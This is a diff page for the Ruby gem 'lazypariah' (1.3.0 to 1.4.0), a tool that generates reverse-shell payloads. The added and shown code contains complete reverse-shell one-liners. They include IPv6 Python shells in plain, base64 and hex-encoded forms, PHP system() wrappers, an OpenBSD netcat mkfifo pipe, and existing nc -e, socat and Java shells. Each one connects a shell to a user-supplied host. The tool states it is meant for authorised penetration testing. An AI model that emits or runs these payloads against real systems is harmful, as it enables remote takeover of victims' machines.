lazypariah 1.3.0 → 1.4.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/bin/lazypariah +34 -2
- metadata +2 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: aea5f9ef7a85656b9d440fc44f3c061a4a6f2a8d0172b9f5c6f8af2d831f309a
|
|
4
|
+
data.tar.gz: d60c230377cc65427a71bb76abdef639f382669370b16dca70ea8862878f5a42
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 8c2e2981ac7c68c60b20c335926add3a953b8fc7829f8d6f23abe303526d578fdcaca6ef4cc04c091f174a58f0d63dcf4c836a76101819fc541583eb9f35e86d
|
|
7
|
+
data.tar.gz: c542e1c298d1466b5f4f39fafc359ff164c299dc77058fc41a93aaefbc7242ab8b5834392d98a204ac77183c20acda0cee39362d2a9d887181576c569bbae2c6
|
data/bin/lazypariah
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
#
|
|
3
3
|
# Title: LAZYPARIAH
|
|
4
|
-
# Version: 1.
|
|
4
|
+
# Version: 1.4.0
|
|
5
5
|
# Description:
|
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
|
@@ -29,7 +29,7 @@ require "stringio"
|
|
|
29
29
|
|
|
30
30
|
# Define constants.
|
|
31
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
|
32
|
-
PROGRAM_VERSION = "1.
|
|
32
|
+
PROGRAM_VERSION = "1.4.0".freeze()
|
|
33
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
|
34
34
|
|
|
35
35
|
# Define payload list.
|
|
@@ -38,6 +38,10 @@ PAYLOAD_LIST = [
|
|
|
38
38
|
"python_c",
|
|
39
39
|
"python_b64",
|
|
40
40
|
"python_hex",
|
|
41
|
+
"python_ipv6",
|
|
42
|
+
"python_ipv6_c",
|
|
43
|
+
"python_ipv6_b64",
|
|
44
|
+
"python_ipv6_hex",
|
|
41
45
|
"nc",
|
|
42
46
|
"nc_pipe",
|
|
43
47
|
"php_fd",
|
|
@@ -45,6 +49,8 @@ PAYLOAD_LIST = [
|
|
|
45
49
|
"php_fd_tags",
|
|
46
50
|
"php_system_python_b64",
|
|
47
51
|
"php_system_python_hex",
|
|
52
|
+
"php_system_python_ipv6_b64",
|
|
53
|
+
"php_system_python_ipv6_hex",
|
|
48
54
|
"perl",
|
|
49
55
|
"perl_c",
|
|
50
56
|
"perl_b64",
|
|
@@ -59,6 +65,7 @@ PAYLOAD_LIST = [
|
|
|
59
65
|
"java_class",
|
|
60
66
|
"c_binary",
|
|
61
67
|
"rust_binary",
|
|
68
|
+
"nc_openbsd"
|
|
62
69
|
].sort()
|
|
63
70
|
|
|
64
71
|
# Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
|
|
@@ -242,25 +249,47 @@ begin
|
|
|
242
249
|
when "python"
|
|
243
250
|
# Python reverse shell.
|
|
244
251
|
print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
252
|
+
when "python_ipv6"
|
|
253
|
+
# Python IPv6 reverse shell.
|
|
254
|
+
print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
245
255
|
when "python_c"
|
|
246
256
|
# Python reverse shell (intended to be run as a command from a shell session).
|
|
247
257
|
print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
258
|
+
when "python_ipv6_c"
|
|
259
|
+
# Python IPv6 reverse shell (intended to be run as a command from a shell session).
|
|
260
|
+
print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
248
261
|
when "python_b64"
|
|
249
262
|
# Base-64-encoded Python reverse shell (intended to be run as a command from a shell session).
|
|
250
263
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
251
264
|
print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
265
|
+
when "python_ipv6_b64"
|
|
266
|
+
# Base-64-encoded Python IPv6 reverse shell (intended to be run as a command from a shell session).
|
|
267
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
268
|
+
print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
252
269
|
when "python_hex"
|
|
253
270
|
# Hex-encoded Python reverse shell (intended to be run as a command from a shell session).
|
|
254
271
|
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
255
272
|
print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
273
|
+
when "python_ipv6_hex"
|
|
274
|
+
# Hex-encoded Python IPv6 reverse shell (intended to be run as a command from a shell session).
|
|
275
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
276
|
+
print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
256
277
|
when "php_system_python_b64"
|
|
257
278
|
# Hybrid shell: python_b64 payload contained within a system function in a miniature PHP script.
|
|
258
279
|
python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
259
280
|
print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
281
|
+
when "php_system_python_ipv6_b64"
|
|
282
|
+
# Hybrid shell: python_ipv6_b64 payload contained within a system function in a miniature PHP script.
|
|
283
|
+
python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
284
|
+
print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
260
285
|
when "php_system_python_hex"
|
|
261
286
|
# Hybrid shell: python_hex payload contained within a system function in a miniature PHP script.
|
|
262
287
|
python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
263
288
|
print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
289
|
+
when "php_system_python_ipv6_hex"
|
|
290
|
+
# Hybrid shell: python_ipv6_hex payload contained within a system function in a miniature PHP script.
|
|
291
|
+
python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
292
|
+
print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
264
293
|
when "nc"
|
|
265
294
|
# Netcat reverse shell.
|
|
266
295
|
print_output(s: "nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
@@ -321,6 +350,9 @@ begin
|
|
|
321
350
|
when "socat"
|
|
322
351
|
# Socat reverse shell.
|
|
323
352
|
print_output(s: "socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
353
|
+
when "nc_openbsd"
|
|
354
|
+
# Netcat (OpenBSD) reverse shell.
|
|
355
|
+
print_output(s: "rm /tmp/r; mkfifo /tmp/r; cat /tmp/r | /bin/sh -i 2>&1 | nc #{ARGV[1]} #{ARGV[2]} > /tmp/r", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
324
356
|
when "java_class"
|
|
325
357
|
# Java class reverse shells (compiled on the fly).
|
|
326
358
|
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: lazypariah
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 1.
|
|
4
|
+
version: 1.4.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Peter Funnell
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2021-03-
|
|
11
|
+
date: 2021-03-27 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|